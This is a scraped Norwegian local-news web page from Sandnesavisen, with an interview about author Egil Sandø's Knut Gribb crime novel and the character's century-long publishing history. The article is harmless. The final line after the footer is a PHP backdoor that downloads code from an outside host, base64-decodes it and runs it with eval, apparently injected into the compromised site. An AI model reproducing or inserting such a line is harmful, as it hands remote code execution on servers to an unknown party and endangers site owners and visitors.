GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Knut Gribb er tilbake
Skrevet av Trude Jensen   
sndag 13. mars 2011

Politifullmektig Knut Georg Gribb fra Oslo er 103 år, men er fortsatt i aktiv tjeneste. Det var forfatteren Sven Elvestad som først skrev om politimannen i 1908. Gribb gjør det fortsatt surt for byens kriminelle, men begynner omsider å dra litt på årene. Det har forfatter Egil Sandø sørget for.

Knut Gribb - sprek hundreåring med nye mysterier
Ved påsketider får den udødelige krimhelten Knut Gribb og den nyetablerte etterforskningsenheten V-gruppa tilsynelatende separate og kurante saker å jobbe med: Tre mistenkelige dødsfall på ulike steder, samt en skipskatastrofe i Oslofjorden.

Sandø skrev i 2009 Gribb-romanen "Alvedansen", som var den første Gribben som utkom mellom stive permer. Nå følger han opp med "Døden og vingehesten", hvor Gribb og hans team får bryne seg mot menneskesmuglere og drapsmenn. Utgangspunktet for mysteriene er drapet på en kriminalforfatter, så Sandø lar det gå hardt ut over sin egen profesjon.

- Hvilket forhold har du til Knut Gribb?

- Jeg har lest det meste av det som har kommet ut. Det er jo ren spenning, helten som kjemper mot det onde. Det er en litt sånn guttegreie. Jeg har et litt annet forhold til det i dag enn den gang, og denne boka er vel mer en slags parodi.

- Ja vel? På hvilken måte?

- Gribb begynner å bli gammel. Han har holdt på i mer enn hundre år, og gjør vel egentlig ikke så mye i boka for å løse mysteriet. Det er mer tilfeldigheter og apparatet rundt som gjør at mysteriet blir løst, sier Sandø. Han sier videre at den klassiske Gribb er et sted midt i førtiårene, og at hans versjon av karakteren er ti år eldre, og nok nærmer seg pensjonsalder.

Gøy å skrive
Sandø legger ikke skjul på at han har hatt det gøy når han har skrevet om den gamle krimhelten.

- Jeg ville skrive denne boka for moro skyld, og spurte meg selv: Hvordan går det egentlig med denne Gribb? Han dør jo aldri. Det er skrevet forferdelig mange elendige Gribb-historier. Det begynner gjerne voldsomt, med en forbrytelse. Så blir saken plutselig løst mot slutten. Det var mye hastverksarbeid på bestilling. De som skrev var jo delvis ansatt i Bladkompaniet. Det var nok til tider vanskelig å få folk til å skrive, og så hadde de tidsfrister på å bli ferdige, spekulerer Sandø.

- Narvesen ville ikke en gang ha bøkene i hyllene sine. Det er egentlig litt rart. Tross alt så var de bedre enn mye av det andre amerikanske tullet de solgte, minnes Sandø.

Lang kriminalhistorie
Mesterdetektiven Knut Gribb ble lansert av forfatteren Sven Elvestad, under pseudonymet Kristian F. Biller, i hefteserien Lys og Skygge i 1908. Serien var tenkt som et sunt og positivt alternativ til importerte og antatt fordervelige krimserier som for eksempel Nick Carter. Fortellingene om Gribb skulle blant annet ikke inneholde drap. Elvestad trakk seg ut i 1909, etter 28 hefter, og Gribb-figuren ble overtatt av andre forfattere inntil Lys og skygge ble nedlagt i 1910. Elvestads Gribb-fortellinger ble senere utgitt under forfatterens vanlige pseudonym, Stein Riverton, og med heltens navn endret til Asbjørn Krag. Knut Gribb gjenoppstod for alvor i 1928 i Detektiv-Magasinet. Bladkompaniet lanserte Gribb som billigbokserie i 1971, og fram til 2004 ble det gitt ut 104 titler. Et vell av kjente og ukjente forfattere har skrevet bøker med Gribb som hovedperson opp gjennom årene. Jon Michelet og Gunnar Staalesen er bare to eksempler. Serien ble nedlagt i forbindelse med at Schibsted AS kjøpte opp Bladkompaniet i 2004. Gribb gjenoppstod med romanen Alvedansen på Commentum forlag i 2009. Da var det første gang han fikk plass mellom to stive permer.

God Gribb-forfatter
Med "Døden og vingehesten" leverer Sandø sin tredje historie om den gamle krimhelten. Den første han skrev het "Kløverligaen", og kom ut i 1997.

- Du sier at det er skrevet mange dårlige forellinger om Gribb. Er det noen Gribb-forfattere som skiller seg ut som spesielt gode?

- Ja, jeg vil si at Olav Ottersen skiller seg ut. Det er kvalitet over det han skriver. Han har også skrevet andre krimromaner. Det var han som skrev de første fortellingene som kom ut på Bladkompaniet, og så har han også skrevet de siste. 

- Hvordan skiller han seg ut?

- Både med språk og oppbygning. Du kan merke at hans fortellinger er ferdige produkt som det er lagt mye arbeid ned i. Han førte også historiene tilbake til de gyldne 1920-30-årene, sier Sandø. Han legger til at han ikke har noe forhold til de tidligste forfatterne som leverte historier til Detektiv-Magasinet.

Oppfølger?
Første gang Sandø prøvde seg på en Gribb-fortelling var på begynnelsen av 70-tallet.

- Det var utlyst en konkurranse i forbindelse med et jubileum, og da tenkte jeg at nå skal jeg skrive en roman. Men på den tiden skrev jeg mest noveller og korte epistler, så det stoppet opp etter tjue sider. Da la jeg det bort. Jeg hadde vel ikke så mye tid, minnes Sandø.

- Kan vi forvente nye historier om Knut Gribb fra deg?

- Ja, jeg skriver litt iblant, så kanskje blir det en oppfølger til "Døden og vingehesten", sier Sandø hemmelighetsfullt og uten å gå mer i detalj.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));